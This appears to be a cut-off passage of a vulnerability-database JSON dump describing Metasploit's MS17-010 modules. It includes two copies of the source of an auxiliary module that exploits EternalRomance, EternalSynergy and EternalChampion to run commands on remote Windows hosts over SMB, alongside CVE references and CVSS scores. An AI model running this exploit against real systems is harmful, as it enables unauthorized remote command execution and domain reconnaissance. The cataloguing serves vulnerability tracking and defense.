EternalRomance, EternalChampion, and EternalSynergy exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a named pipe.\n", "enchantments": {"dependencies": {"modified": "2020-02-14T04:22:35", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "type": "cve"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["SMNTC-96709", "SMNTC-96707", "SMNTC-96703"], "type": "symantec"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MS:CVE-2017-0146", "MS:CVE-2017-0143", "MS:CVE-2017-0147"], "type": "mscve"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"], "type": "trendmicroblog"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2020-02-14T04:22:35", "value": 7.2, "vector": "NONE"}}, "hash": "032f89b8b6efb729d4cc700fbcf6660e", "history": [], "href": "", "id": "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "lastseen": "2020-02-14T04:22:35", "metasploitHistory": "", "metasploitReliability": "", "modified": "2019-05-23T01:05:44", "objectVersion": "1.4", "published": "2018-01-29T01:13:25", "references": ["https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://github.com/worawit/MS17-010", "https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010\n include Msf::Exploit::Remote::SMB::Client::Psexec\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution',\n 'Description' => %q{\n This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where\n primitive. This will then be used to overwrite the connection session information with as an\n Administrator session. From there, the normal psexec command execution is done.\n\n Exploits a type confusion between Transaction and WriteAndX requests and a race condition in\n Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy\n exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a\n named pipe.\n },\n\n 'Author' => [\n 'sleepya', # zzz_exploit idea and offsets\n 'zerosum0x0',\n 'Shadow Brokers',\n 'Equation Group'\n ],\n\n 'License' => MSF_LICENSE,\n 'References' => [\n [ 'MSB', 'MS17-010' ],\n [ 'CVE', '2017-0143'], # EternalRomance/EternalSynergy - Type confusion between WriteAndX and Transaction requests\n [ 'CVE', '2017-0146'], # EternalChampion/EternalSynergy - Race condition with Transaction requests\n [ 'CVE', '2017-0147'], # for EternalRomance reference\n [ 'URL', 'https://github.com/worawit/MS17-010' ],\n [ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ],\n [ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ],\n ],\n 'DisclosureDate' => 'Mar 14 2017',\n 'Notes' =>\n {\n 'AKA' => [\n 'ETERNALSYNERGY',\n 'ETERNALROMANCE',\n 'ETERNALCHAMPION',\n 'ETERNALBLUE' # does not use any CVE from Blue, but Search should show this, it is preferred\n ]\n }\n ))\n\n register_options([\n OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server', 'C$']),\n OptString.new('COMMAND', [true, 'The command you want to execute on the remote host', 'net group \"Domain Admins\" /domain']),\n OptString.new('RPORT', [true, 'The Target port', 445]),\n OptString.new('WINPATH', [true, 'The name of the remote Windows directory', 'WINDOWS']),\n ])\n\n register_advanced_options([\n OptString.new('FILEPREFIX', [false, 'Add a custom prefix to the temporary files','']),\n OptInt.new('DELAY', [true, 'Wait this many seconds before reading output and cleaning up', 0]),\n OptInt.new('RETRY', [true, 'Retry this many times to check if the process is complete', 0]),\n ])\n end\n\n def run_host(ip)\n begin\n if datastore['SMBUser'].present?\n print_status(\"Authenticating to #{ip} as user '#{splitname(datastore['SMBUser'])}'...\")\n end\n eternal_pwn(ip) # exploit Admin session\n smb_pwn(ip) # psexec\n\n rescue ::Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010::MS17_010_Error => e\n print_error(\"#{e.message}\")\n rescue ::Errno::ECONNRESET,\n ::Rex::HostUnreachable,\n ::Rex::Proto::SMB::Exceptions::LoginError,\n ::Rex::ConnectionTimeout,\n ::Rex::ConnectionRefused => e\n print_error(\"#{e.class}: #{e.message}\")\n rescue => error\n print_error(error.class.to_s)\n print_error(error.message)\n print_error(error.backtrace.join(\"\\n\"))\n ensure\n eternal_cleanup() # restore session\n end\n end\n\n def smb_pwn(ip)\n text = \"\\\\#{datastore['WINPATH']}\\\\Temp\\\\#{datastore['FILEPREFIX']}#{Rex::Text.rand_text_alpha(16)}.txt\"\n bat = \"\\\\#{datastore['WINPATH']}\\\\Temp\\\\#{datastore['FILEPREFIX']}#{Rex::Text.rand_text_alpha(16)}.bat\"\n @smbshare = datastore['SMBSHARE']\n @ip = ip\n\n # Try and authenticate with given credentials\n output = execute_command_with_output(text, bat, datastore['COMMAND'], @smbshare, @ip, datastore['RETRY'], datastore['DELAY'])\n\n # Report output\n print_good(\"Command completed successfully!\")\n print_status(\"Output for \\\"#{datastore['COMMAND']}\\\":\\n\")\n print_line(\"#{output}\\n\")\n report_note(\n :rhost => datastore['RHOSTS'],\n :rport => datastore['RPORT'],\n :type => \"psexec_command\",\n :name => datastore['COMMAND'],\n :data => output\n )\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/smb/ms17_010_command.rb", "title": "MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution", "type": "metasploit", "viewCount": 264}, "differentElements": ["published", "modified"], "edition": 126, "lastseen": "2020-02-14T04:22:35"}], "viewCount": 481, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0147"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-33895"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96709", "SMNTC-96707"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0147", "MS:CVE-2017-0143", "MS:CVE-2017-0146"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "securelist", "idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}], "modified": "2020-10-13T19:19:22", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2020-10-13T19:19:22", "rev": 2}}, "objectVersion": "1.5", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/smb/ms17_010_command.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010\n include Msf::Exploit::Remote::SMB::Client::Psexec\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution',\n 'Description' => %q{\n This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where\n primitive. This will then be used to overwrite the connection session information with as an\n Administrator session. From there, the normal psexec command execution is done.\n\n Exploits a type confusion between Transaction and WriteAndX requests and a race condition in\n Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy\n exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a\n named pipe.\n },\n\n 'Author' => [\n 'sleepya', # zzz_exploit idea and offsets\n 'zerosum0x0',\n 'Shadow Brokers',\n 'Equation Group'\n ],\n\n 'License' => MSF_LICENSE,\n 'References' => [\n [ 'MSB', 'MS17-010' ],\n [ 'CVE', '2017-0143'], # EternalRomance/EternalSynergy - Type confusion between WriteAndX and Transaction requests\n [ 'CVE', '2017-0146'], # EternalChampion/EternalSynergy - Race condition with Transaction requests\n [ 'CVE', '2017-0147'], # for EternalRomance reference\n [ 'URL', 'https://github.com/worawit/MS17-010' ],\n [ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ],\n [ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ],\n ],\n 'DisclosureDate' => '2017-03-14',\n 'Notes' =>\n {\n 'AKA' => [\n 'ETERNALSYNERGY',\n 'ETERNALROMANCE',\n 'ETERNALCHAMPION',\n 'ETERNALBLUE' # does not use any CVE from Blue, but Search should show this, it is preferred\n ]\n }\n ))\n\n register_options([\n OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server', 'C$']),\n OptString.new('COMMAND', [true, 'The command you want to execute on the remote host', 'net group \"Domain Admins\" /domain']),\n OptPort.new('RPORT', [true, 'The Target port', 445]),\n OptString.new('WINPATH', [true, 'The name of the remote Windows directory', 'WINDOWS']),\n ])\n\n register_advanced_options([\n OptString.new('FILEPREFIX', [false, 'Add a custom prefix to the temporary files','']),\n OptInt.new('DELAY', [true, 'Wait this many seconds before reading output and cleaning up', 0]),\n OptInt.new('RETRY', [true, 'Retry this many times to check if the process is complete', 0]),\n ])\n\n deregister_options('SMB::ProtocolVersion')\n end\n\n def run_host(ip)\n begin\n if datastore['SMBUser'].present?\n print_status(\"Authenticating to #{ip} as user '#{splitname(datastore['SMBUser'])}'...\")\n end\n eternal_pwn(ip) # exploit Admin session\n smb_pwn(ip) # psexec\n\n rescue ::Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010::MS17_010_Error => e\n print_error(\"#{e.message}\")\n rescue ::Errno::ECONNRESET,\n ::Rex::HostUnreachable,\n ::Rex::Proto::SMB::Exceptions::LoginError,\n ::Rex::ConnectionTimeout,\n ::Rex::ConnectionRefused => e\n print_error(\"#{e.class}: #{e.message}\")\n rescue => error\n print_error(error.class.to_s)\n print_error(error.message)\n print_error(error.backtrace.join(\"\\n\"))\n ensure\n eternal_cleanup() # restore session\n end\n end\n\n def smb_pwn(ip)\n text = \"\\\\#{datastore['WINPATH']}\\\\Temp\\\\#{datastore['FILEPREFIX']}#{Rex::Text.rand_text_alpha(16)}.txt\"\n bat = \"\\\\#{datastore['WINPATH']}\\\\Temp\\\\#{datastore['FILEPREFIX']}#{Rex::Text.rand_text_alpha(16)}.bat\"\n @smbshare = datastore['SMBSHARE']\n @ip = ip\n\n # Try and authenticate with given credentials\n output = execute_command_with_output(text, bat, datastore['COMMAND'], @smbshare, @ip, delay: datastore['DELAY'], retries: datastore['RETRY'])\n\n # Report output\n print_good(\"Command completed successfully!\")\n print_status(\"Output for \\\"#{datastore['COMMAND']}\\\":\\n\")\n print_line(\"#{output}\\n\")\n report_note(\n :rhost => datastore['RHOSTS'],\n :rport => datastore['RPORT'],\n :type => \"psexec_command\",\n :name => datastore['COMMAND'],\n :data => output\n )\n end\nend\n", "metasploitReliability": "", "metasploitHistory": "", "_object_type": "robots.models.metasploit.MetasploitBulletin", "_object_types": ["robots.models.metasploit.MetasploitBulletin", "robots.models.base.Bulletin"], "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "e6f53676ca888a6a837a24417efa2477"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "0762dab7827371d2474b2f3149cd5d38"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "e80bef8ab7c34172a2f61c17200cdbec"}, {"key": "published", "hash": "b1b79302e85cd03f0ea3818121409a3e"}, {"key": "references", "hash": "7bc839b0566b34ac03da233f997066ff"}, {"key": "reporter", "hash": "74798933f90c8c8a3dcac277d7c31e76"}, {"key": "title", "hash": "7bf92dcded785b5598f61cda83fdc26f"}, {"key": "type", "hash": "6719951e37a5b7c4b959f8df50c9d641"}], "scheme": null}, {"id": "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "hash": "449b38dc690763656e56bd6e594e9633aa16975df48c4aab6139c279dd7e8b4c", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution", "description": "This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where primitive. This will then be used to overwrite the connection session information with as an Administrator session. From there, the normal psexec payload code execution is done. Exploits a type confusion between Transaction and WriteAndX requests and a race condition in Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a named pipe.\n", "published": "2018-01-29T01:13:25", "modified": "2020-10-02T20:00:37", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://github.com/worawit/MS17-010", "https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf", "https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/"], "cvelist": ["CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0147"], "lastseen": "2020-10-07T20:08:39", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "description": "This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where primitive. This will then be used to overwrite the connection session information with as an Administrator session. From there, the normal psexec payload code execution is done. Exploits a type confusion between Transaction and WriteAndX requests and a race condition in Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a named pipe.\n", "edition": 1, "enchantments": {"dependencies": {"modified": "2020-10-07T20:08:39", "references": [{"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "type": "cve"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["SMNTC-96709", "SMNTC-96707", "SMNTC-96703"], "type": "symantec"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"], "type": "ics"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MS:CVE-2017-0146", "MS:CVE-2017-0143", "MS:CVE-2017-0147"], "type": "mscve"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"], "type": "trendmicroblog"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-10-07T20:08:39", "rev": 2, "value": 6.9, "vector": "NONE"}}, "hash": "86bc26b94be4fda7496f9365ab40936b61d967769788ad706c71459a547733aa", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "href"}, {"hash": "47b769fdc546934555b5b0069a032cde", "key": "description"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "74798933f90c8c8a3dcac277d7c31e76", "key": "reporter"}, {"hash": "7bc839b0566b34ac03da233f997066ff", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "e80bef8ab7c34172a2f61c17200cdbec", "key": "modified"}, {"hash": "6719951e37a5b7c4b959f8df50c9d641", "key": "type"}, {"hash": "b1b79302e85cd03f0ea3818121409a3e", "key": "published"}, {"hash": "0f387fb9bc28015146a12fe47c73e11c", "key": "title"}, {"hash": "e6f53676ca888a6a837a24417efa2477", "key": "cvelist"}], "history": [], "href": "", "id": "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "immutableFields": [], "lastseen": "2020-10-07T20:08:39", "modified": "2020-10-02T20:00:37", "objectVersion": "1.5", "published": "2018-01-29T01:13:25", "references": ["https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://github.com/worawit/MS17-010", "https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf", 